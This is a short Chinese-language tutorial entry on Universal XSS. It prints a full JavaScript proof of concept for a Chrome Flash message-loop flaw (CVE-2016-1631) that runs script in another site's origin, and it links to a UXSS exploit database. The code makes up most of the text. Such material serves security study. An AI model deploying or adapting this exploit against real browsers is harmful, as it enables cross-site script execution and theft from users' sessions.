1.3.11 Uxss

UXSS全称Universal Cross-Site Scripting,翻译过来就是通用型XSS,也叫Universal XSS。

以Chrome浏览器Flash message loop 使用不当导致UXSS漏洞(CVE-2016-1631)为例

POC如下

var c0 = 0;
var c1 = 0;
var fs = [];
function cp() {
++c0;
}
for (var a = 0; a < 10; a++) {
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.src = 'p.swf';
fs.push(i);
}
function ml() {
var pw = fs.pop().contentWindow;
pw.name = 'p' + fs.length;
pw.document.querySelector('embed').f();
var a = document.createElement('a');
a.href = 'about:blank';
a.target = 'p' + fs.length;
a.click();
if (fs.length < 6) {
var then = Date.now();
while (Date.now() - then < 1000) {}
}
}
function f() {
if (++c1 == 2) {
var x1 = x.contentWindow[0].frameElement.nextSibling;
x1.src = 'https://abc.xyz';
try {
while (x1.contentDocument) { ml(); }
} catch(e) {
x1.src = '[removed]if(location!="about:blank")alert([removed])';
}
}
}
function c() {
if (c0 == 10) {
clearInterval(t);
x = document.documentElement.appendChild(document.createElement('iframe'));
x.src = 'f.html';
}
}
var t = setInterval(c, 100);

一个致力于收集uxss的数据库

https://github.com/Metnew/uxss-db